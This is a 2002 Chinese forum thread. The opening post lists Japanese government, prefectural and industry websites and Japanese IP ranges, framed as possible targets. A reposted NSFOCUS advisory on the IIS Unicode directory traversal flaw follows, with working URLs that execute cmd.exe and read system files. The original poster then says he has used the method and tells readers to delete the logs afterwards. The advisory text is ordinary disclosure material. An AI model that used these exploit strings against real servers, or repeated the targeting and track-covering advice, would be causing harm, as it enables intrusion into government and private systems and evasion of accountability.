.X.T.I.M.

驱动大牛

注册日期2001-09-22
最后登录2021-08-25
粉丝0
关注0
积分1分
威望10点
贡献值0点
好评度0点
原创分0分
专家分0分

加关注写私信

阅读：1291回复：6

日本的IP及网站[想干什么是你自己的事！]

楼主^#

更多发布于：2002-05-22 23:57

总理大臣居所http://www.kantei.go.jp/index-e.html
总理办公室http://www.sorifu.go.jp/english/index-e.html
安全部http://www.jda.go.jp/index_e.html
经济部http://www.epa.go.jp
科技部http://www.sta.go.jp/index-e.html
环境部http://mx.eic.or.jp/eanet/index-e.html
发展部http://www.oda.go.jp /
土地部http://www.nla.go.jp/welcome-e.html
贸易部http://www.jftc.go.jp/e-page/f_home.htm
外务省http://www.mofa.go.jp /
财政部http://www.mof.go.jp/english/index.htm
教育部http://www.monbu.go.jp/emindex.html
卫生部http://www.mhw.go.jp/english/index.html
农林牧副渔部http://www.maff.go.jp/eindex.html
国贸部http://www.miti.go.jp/index-e.html
交通部http://www.motnet.go.jp/index.htm
邮电部http://www.mpt.go.jp/index-e.html
劳动部http://www.mol.go.jp/english/index.htm
建设部http://www.moc.go.jp/eng/eng/index.htm
内务部http://www.mha.go.jp/eng/index.htm

日本各市县政府机构
Aichihttp://www.pref.aichi.jp/index-e.html
Aomorihttp://www.pref.aomori.jp/home-e.html
Chibahttp://www.pref.chiba.jp/index-e.html
Ehimehttp://www.pref.ehime.jp/index-e.htm
Fukuihttp://www.pref.fukui.jp/english/index.html

Fukushimahttp://www.pref.fukushima.jp/index_e.html

Hiroshimahttp://www.hiroshima-cdas.or.jp/pref/index-e.html
Hokkaidohttp://www.pref.hokkaido.jp/index-e.html
Hukushimahttp://www.pref.fukushima.jp/index_e.html
Hyogohttp://web.pref.hyogo.jp/index-e.htm
Ibarakihttp://www.pref.ibaraki.jp/index-e.html
Ishikawahttp://www.pref.ishikawa.jp/index_e.htm
Iwatehttp://www.office.pref.iwate.jp/index_e.html

Kagoshimahttp://www.pref.kagoshima.jp/pref/english/index.html
Kanagawahttp://www.pref.kanagawa.jp/index-e.html
Kochihttp://www.pref.kochi.jp/~kokusai/index.html
Kyotohttp://www.pref.kyoto.jp/normal/index_e.html
Miehttp://www.pref.mie.jp/ENGLISH /
Miyazakihttp://www.pref.miyazaki.jp/english/index.htm
Naganohttp://www.pref.nagano.jp/english/index_e.htm
Nagasakihttp://www.us1.nagasaki-noc.or.jp/~nagasaki/index_e.html
Narahttp://www.pref.nara.jp/index-e.html
Niigatahttp://www.pref.niigata.jp/en/index.html

Oitahttp://www.coara.or.jp/OITAPref/OITA_HOME_EN.html

Okinawahttp://www.pref.okinawa.jp/index.html
Osakahttp://www.pref.osaka.jp/osaka-pref/indexe.html
Sagahttp://www.pref.saga.jp/eibun/esagaken.html
Saitamahttp://www.pref.saitama.jp/core_e.html
Shigahttp://www.pref.shiga.jp/index-e.html
Shimanehttp://www.pref.shimane.jp/index_e.html
Shizuokahttp://www.pref.shizuoka.jp/indexE.html
Tokyohttp://www.metro.tokyo.jp /
Tokushima
http://www.pref.tokushima.jp/index_e.html

Toyamahttp://www.pref.toyama.jp/index-e.html
Wakayamahttp://www.wakayama.go.jp/index_e.html
Yamagatahttp://www.pref.yamagata.jp/index-e.html
Yamaguchihttp://www.pref.yamaguchi.jp/index_e.htm
Yamanashihttp://www.pref.yamanashi.jp/english/english.html

以下是集团
Japan Federation of Economic
Organizations (Keidanren)
http://www.keidanren.or.jp/

Japan Association of Corporate
Executives (KEIZAI DOYUKAI)
http://www.doyukai.or.jp/Eindex.htm

The Japan Chamber of Commerce & Industry
http://www.jcci.or.jp/home-e.html

Central Union of Agricultural Co-operatives of Japan (JA-ZENCHU)
http://www.rim.or.jp/ci/ja/ejahome.html

Federation of Bankers Associations of Japan (ZENGINKYO)
http://www.zenginkyo.or.jp/en/index.htm

The Federation of Electric Power Companies
http://www.fepc.or.jp/index_e.html

Japan Whaling Association
http://www.jp-whaling-assn.com/english/index.htm

The Japanese Institute of Certified Public Accountants
http://www.jicpa.or.jp/eng/index.html

The Japan Magazine Publishers Association
http://www.j-magazine.or.jp/FIPP/FIPPE/mokuji.html

Japan Book Publishers Association
http://www.jbpa.or.jp/default-e.htm

Japan Pharmaceutical Manufacturers Association
http://www.jpma.or.jp/english/index-e.html

The Iron and Steel Institute of Japan
http://www.isij.or.jp/e_index.htm

Japan Hotel Association
http://www.j-hotel.or.jp/english/index.html

Japanese Trade Union Confederation (RENGO)
http://www.jtuc-rengo.or.jp/english/index.html

National Confederation of Trade Unions (Zenroren)
http://www.iijnet.or.jp/c-pro/union/aa_e/index_e.html

大阪县政府
http://www.pref.osaka.jp/
大阪市政府
http://www.city.osaka.jp/

http://www.kantei.go.jp/\">首相官邸
http://www.jinji.admix.go.jp/\">人事院
http://www.clb.admix.go.jp/\">内阁法制
http://www.sorifu.go.jp/\">总理府
http://www.jftc.admix.go.jp/\">公正取引委员
http://www.npa.go.jp/\">警察厅
http://www.kouchoi.go.jp/\">公害等调整委员?
http://www.kunaicho.go.jp/\">宫内厅
http://www.somucho.go.jp/\">总务厅
http://www.stat.go.jp/\">总务厅统计
http://www.stat.go.jp/1.htm\">[英]
http://www.hda.go.jp/\">北海道开发厅[日
http://www.jda.go.jp/\">防卫厅
http://www.epa.go.jp/\">经济企画厅
http://www.sta.go.jp/\">科学技术厅
http://www.oda.go.jp/\">冲绳开发厅[日
http://www.nla.go.jp/\">国土厅
http://www.fsa.go.jp/\">金融监督?
http://www.moj.go.jp/\">法务省
http://www.mofa.go.jp/\">外务省
http://www.mof.go.jp/\">大藏省
http://www.nta.go.jp/\">国税厅[日
http://www.monbu.go.jp/\">文部省
http://www.monbu.go.jp/emindex.html\">[英]
文化厅[日]
厚生省 Ministry of
http://www.maff.go.jp/\">农林水产省
Ministr
http://www.miti.go.jp/\">通商产业省
Ministr
http://www.hkd.miti.go.jp\">MITI Hokkaido[?
http://www.tohoku.miti.go.jp\"
http://www.kantou.miti.go.jp\"
http://www.chubu.miti.go.jp\">
http://www.miti-kansai.go.jp\"
http://www.chugoku.miti.go.jp
http://www.shikoku.miti.go.jp
http://www.miti-kyushu.go.jp\"
http://www.enecho.go.jp/\">资源能源厅
http://www.jpo-miti.go.jp/\">特许厅
http://www.motnet.go.jp/\">运输省
http://www.kaiho.motnet.go.jp/\">海上保安厅
http://www.kishou.go.jp/\">气象
http://www.mpt.go.jp/\">邮政省
http://www.mol.go.jp/\">劳动省
http://www.moc.go.jp/\">建设省
http://www.mha.go.jp/\">自治省
http://www.fdma.go.jp/\">消防厅
http://www.jbaudit.admix.go.jp/\">会计检查

日本的IP地址分配

202.011.000.000 202.011.255.255
202.012.008.000 202.012.015.255
202.013.000.000 202.013.127.255
202.013.128.000 202.013.191.255
202.013.192.000 202.013.223.255
202.013.224.000 202.013.239.255
202.013.240.000 202.013.247.255
202.013.248.000 202.013.251.255
202.013.252.000 202.013.253.255
202.013.254.000 202.013.254.255
202.015.000.000 202.015.255.255
202.016.000.000 202.019.255.255
202.020.090.000 202.020.090.255
202.020.110.000 202.020.110.255
202.020.123.000 202.020.123.255
202.020.124.000 202.020.124.255
202.021.112.000 202.021.127.255
202.021.150.000 202.021.151.255
202.021.152.000 202.021.153.255
202.022.064.000 202.022.127.255
202.023.000.000 202.023.255.255
202.024.000.000 202.025.255.255
202.026.000.000 202.026.255.255
202.032.000.000 202.035.255.255
202.048.000.000 202.048.255.255
202.139.192.000 202.139.207.255
202.140.000.000 202.140.031.255
202.176.000.032 202.176.000.063
202.176.000.064 202.176.000.127
202.176.000.128 202.176.000.255
202.176.001.000 202.176.001.255
202.176.002.000 202.176.003.255
202.208.000.000 202.255.255.255
203.136.000.000 203.141.255.255
203.178.000.000 203.183.255.255
203.216.000.000 203.216.255.255
210.007.128.000 210.007.255.255
210.081.000.000 210.081.031.255
210.088.000.000 210.088.191.255
210.128.000.000 210.175.255.255
210.188.000.000 210.191.255.255
210.196.000.000 210.199.255.255
210.224.000.000 210.239.255.255
210.248.000.000 210.255.255.255

喜欢2

最新喜欢：

moqing...

.X.T.I.M.

驱动大牛

注册日期2001-09-22
最后登录2021-08-25
粉丝0
关注0
积分1分
威望10点
贡献值0点
好评度0点
原创分0分
专家分0分

加关注写私信

沙发^#

发布于：2002-05-23 00:04

Microsoft IIS Unicode解码目录遍历漏洞

发布日期: 2000/10/20

受影响的软件及系统：
==================

- Microsoft IIS 4.0
- Microsoft IIS 5.0

综述：
=====

NSFOCUS安全小组发现微软IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在
一个安全漏洞，导致用户可以远程通过IIS执行任意命令。当IIS打开文件时，
如果该文件名包含unicode字符，它会对其进行解码，如果用户提供一些特殊
的编码，将导致IIS错误的打开或者执行某些web根目录以外的文件。

漏洞分析：
==========

对于IIS 5.0/4.0中文版，当IIS收到的URL请求的文件名中包含一个特殊的编码
例如\"%c1%hh\"或者\"%c0%hh\",它会首先将其解码变成:0xc10xhh，然后尝试打开
这个文件，Windows 系统认为0xc10xhh可能是unicode编码，因此它会首先将其
解码，如果 0x00<= %hh < 0x40的话，采用的解码的格式与下面的格式类似：

%c1%hh -> (0xc1 - 0xc0) * 0x40 + 0xhh
%c0%hh -> (0xc0 - 0xc0) * 0x40 + 0xhh

例如，在Windows 2000 简体中文版 + IIS 5.0 + SP1系统下测试：

http://target/A.ida/%c1%00.ida

IIS会报告说 \"@.ida\" 文件找不到
这里: （0xc1-0xc0)*0x40+0x00=0x40=\'@\'

http://target/A.ida/%c1%01.ida
IIS会报告说 \"A.ida\" 文件找不到
这里: （0xc1-0xc0)*0x40+0x01=0x41=\'A\'

http://target/A.ida/%c1%02.ida
IIS会报告说 \"B.ida\" 文件找不到
这里: （0xc1-0xc0)*0x40+0x02=0x42=\'B\'
.....

http://target/A.ida/%c0%21.ida
IIS会报告说 \"!.ida\" 文件找不到
这里: （0xc0-0xc0)*0x40+0x21=0x21=\'!\'
....

因此，利用这种编码，我们可以构造很多字符，例如:

%c1%1c -> (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = \'/\'
%c0%2f -> (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = \'\\\'

攻击者可以利用这个漏洞来绕过IIS的路径检查，去执行或者打开任意的文件。

Rain Forest Puppy 测试发现对于英文版的IIS 4.0/5.0,
此问题同样存在，只是编码格式略有不同，变成\"%c0%af\"或者\"%c1%9c\".

漏洞测试：
==========

(1) 如果系统包含某个可执行目录，就可能执行任意系统命令。下面的URL可能
列出当前目录的内容：

http://www.victim.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

(2) 利用这个漏洞查看系统文件内容也是可能的：

http://www.victim.com/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini

临时解决方法:
============

1、如果不需要可执行的CGI，可以删除可执行虚拟目录,例如 /scripts等等。
2、如果确实需要可执行的虚拟目录，建议可执行虚拟目录单独在一个分区。

解决方案：
==========

微软已就此发布了一个安全公告(MS00-078) 以及相应补丁。

您可以在下列地址看到微软安全公告的详细内容：

http://www.microsoft.com/technet/security/bulletin/ms00-078.asp

补丁程序可以在下列地址下载：

. Microsoft IIS 4.0:

http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp

. Microsoft IIS 5.0:

http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp

注意：这个补丁程序与MS00-57中所提供的补丁是同一个程序，如果您已经安装了
MS00-57中的补丁，您可以不用再重新安装此补丁程序。

声明：
=====

本安全公告仅用来描述可能存在的安全问题，中联绿盟信息技术公司不为此安全公告提供
任何保证或承诺。由于传播、利用此安全公告所提供的信息而造成的任何直接或者间接的
后果及损失，均由使用者本人负责，中联绿盟信息技术公司以及安全公告作者不为此承担
任何责任。
中联绿盟信息技术公司拥有对此安全公告的修改和解释权。如欲转载或传播此安全公告，
必须保证此安全公告的完整性，包括版权声明等全部内容。未经中联绿盟信息技术公司允
许，不得任意修改或者增减此安全公告内容，不得以任何方式将其用于商业目的。

回复喜欢

moqingsong

论坛版主

注册日期2002-04-07
最后登录2011-02-03
粉丝0
关注0
积分74分
威望71点
贡献值0点
好评度10点
原创分0分
专家分0分

加关注写私信

板凳^#

发布于：2002-05-23 00:20

这么好的技术内容怎么粘到灌水版了？好。。好。。

按第一贴的“给分”键，给分。

回复喜欢

.X.T.I.M.

驱动大牛

注册日期2001-09-22
最后登录2021-08-25
粉丝0
关注0
积分1分
威望10点
贡献值0点
好评度0点
原创分0分
专家分0分

加关注写私信

地板^#

发布于：2002-05-23 00:45

这个方法是可行的！过去我用过！的确很好用！记得删除LOG哦！！

回复喜欢

wolffy

驱动老牛

注册日期2001-03-23
最后登录2018-04-15
粉丝0
关注0
积分72分
威望71点
贡献值0点
好评度9点
原创分0分
专家分0分

加关注写私信

地下室^#

发布于：2002-05-23 11:26

难怪我用Apache做服务器的时候，老有人想执行我的系统文件。我就猜想是IIS的漏洞。怎么网上那么多无聊的人啊，我是动态的IP，是不是他们不停的扫描IP范围的80端口，难道他们不用做别的事？

我坐在石头上，石头有点烫，但烫的很舒服。

回复喜欢

.X.T.I.M.

驱动大牛

注册日期2001-09-22
最后登录2021-08-25
粉丝0
关注0
积分1分
威望10点
贡献值0点
好评度0点
原创分0分
专家分0分

加关注写私信

5楼^#

发布于：2002-05-23 14:20

A和I有关系吗？？

回复喜欢

wolffy

驱动老牛

注册日期2001-03-23
最后登录2018-04-15
粉丝0
关注0
积分72分
威望71点
贡献值0点
好评度9点
原创分0分
专家分0分

加关注写私信

6楼^#

发布于：2002-05-23 14:42

当然没关系啊，只是我想他们只要是有80端口就试图执行下啊。可能那些人比较笨。

我坐在石头上，石头有点烫，但烫的很舒服。

回复喜欢

您需要登录后才可以回帖，登录或者注册